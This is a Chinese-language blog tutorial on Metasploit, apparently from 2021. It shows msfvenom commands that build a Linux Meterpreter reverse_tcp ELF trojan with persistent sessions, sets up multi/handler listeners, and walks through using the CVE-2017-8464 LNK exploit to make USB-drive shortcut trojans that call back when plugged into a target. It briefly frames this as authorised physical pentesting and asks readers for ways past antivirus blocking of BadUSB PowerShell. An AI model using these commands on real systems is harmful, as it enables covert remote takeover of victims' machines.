Kali渗透(二)--Linux主机上线和U盘马制作

本文最后更新于:2 年前

Linux主机上线

msf生成Linux木马和监听

1
2
3
4
5
6
7
msfconsole
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=域名或ip lport=端口 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf>文件名.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 域名或ip
set lport 端口
exploit

其中ELF(可执行和链接格式)是Linux系统的可执行文件,个人理解为相当于Windows的exe可执行文件。

这里我们可以发现和以前相比,多加了两个session开头的选项,它们代表的含义分别是使会话不会销毁和会话优先级最高。

U盘马制作

什么是近源渗透?

近源渗透测试是网络空间安全领域逐渐兴起的一种新的安全评估手段。

它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”,最后以隐秘的方式将评估结果带出上报,由此证明企业安全防护存在漏洞。

这里我们通过U盘马使目标机器上线,实际上也是近源渗透的一种方式。

msf生成U盘马

1
2
3
4
5
6
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/x64/meterpreter/reverse_tcp
set lhost 域名或ip
set lport 端口
exploit

执行后会生成大量快捷方式,它们都保存在一个隐藏文件夹内,把它改为可见的文件夹,并进入里面的local目录。把目录里面所有的快捷方式拷贝到准备好的U盘中,在目标机器上插上U盘,目标机器成功上线。不要忘记设置监听:

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 域名或ip
set LPORT 端口
exploit

当然了,也可以选择使用badusb开发板,前提是需要使用arduino,自己写入各种代码。本人尝试过digispark和leonardo两种开发板,用powershell执行命令均会被火绒拦截,如果各位大佬有解决方案,欢迎在评论区留言!


Kali渗透(二)--Linux主机上线和U盘马制作
https://rookieterry.github.io/2021/10/28/Kali渗透(二)-Linux主机上线和U盘马制作/
作者
HackerTerry
发布于
星期四, 十月 28日 2021, 12:49 凌晨
许可协议